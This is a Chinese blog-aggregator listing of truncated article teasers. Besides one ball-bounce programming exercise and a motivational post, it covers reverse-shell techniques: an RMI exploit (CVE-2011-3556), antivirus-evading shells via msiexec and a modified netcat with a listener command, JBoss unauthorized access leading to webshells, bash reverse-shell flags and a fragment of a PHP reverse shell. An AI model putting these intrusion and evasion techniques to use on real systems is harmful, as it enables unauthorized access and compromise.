问题描述 一球从某一高度落下(整数,单位米),每次落地后反跳回原来高度的一半,再落下。 编程计算气球在第10次落地时,共经过多少米? 第10次反弹多高? 输入 输入一个整数h,表示球的初始高度。 输出 输出包含两行: 第1行:到球第10次落地时,一共经过的米数。 第2行:第10次弹跳的高度。 注意: ...
分类:
编程语言 时间:
2019-08-18 13:27:14
阅读次数:
85
CVE-2011-3556 该模块利用了RMI的默认配置。注册表和RMI激活服务,允许加载类来自任何远程(HTTP)URL。当它在RMI中调用一个方法时分布式垃圾收集器,可通过每个RMI使用endpoint,它可以用于rmiregist和rmid,以及对大多 漏洞利用: 漏洞常用端口1099 反弹s ...
分类:
编程语言 时间:
2019-08-15 13:04:34
阅读次数:
309
通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行 利用Msiexec进程反弹 Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Updat ...
分类:
其他好文 时间:
2019-08-10 18:58:28
阅读次数:
239
攻击场景 Attacker:192.168.0.106 win10 Victim:192.168.2.140 kali NC 反弹 shell Netcat简介 俗称瑞士军刀或NC,小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接地或容易地驱动。 同时 ...
分类:
系统相关 时间:
2019-08-04 00:55:16
阅读次数:
132
jboss 未授权访问漏洞复现 一、漏洞描述 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建及复现 1、 这里用CVE-2017-7504的漏洞环境,启动环境 docker-compose up ...
分类:
其他好文 时间:
2019-08-02 14:34:35
阅读次数:
139
经常看到很多人在低谷时产生出一股洪荒之力,只是大部分人把这股神奇的力量用错了地方,今天的主题是分析如何把这股宝贵的力量、勇猛的反弹巨势用在刀刃上
分类:
其他好文 时间:
2019-07-30 12:40:41
阅读次数:
92
反弹shell 1.bash反弹 攻击机监听端口 -n: 不反向解析dns,即不通过ip解析域名 no dns -v: 详细信息输出 verbose -l: 监听 listen -p: 指定端口 port 靶机执行shell命令 bash -i:交互式shell >& :输入输出重定向:0 stdi ...
分类:
系统相关 时间:
2019-07-29 19:02:53
阅读次数:
333
有时候网站服务器上有杀毒软件,我们上传的nc.exe、lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell。 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀。 参考链接:https://medium.com/bugbount ...
分类:
编程语言 时间:
2019-07-21 13:32:35
阅读次数:
601
GitHub链接:https://github.com/7hmA3s/netcat 免杀情况: 360杀毒/5.0.0.8160 -- 静态扫描和动态执行均免杀 赛门铁克/14.0.3752 -- 静态扫描和动态执行均免杀 反弹shell步骤: 第1步: 外网服务器执行: netcat -l -p ...
分类:
Web程序 时间:
2019-07-21 13:16:40
阅读次数:
168
array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w")); $cwd = getcwd(); $msg = php_uname()."\n------------Code by Spider-------------\n"; i... ...
分类:
系统相关 时间:
2019-07-16 12:24:40
阅读次数:
131
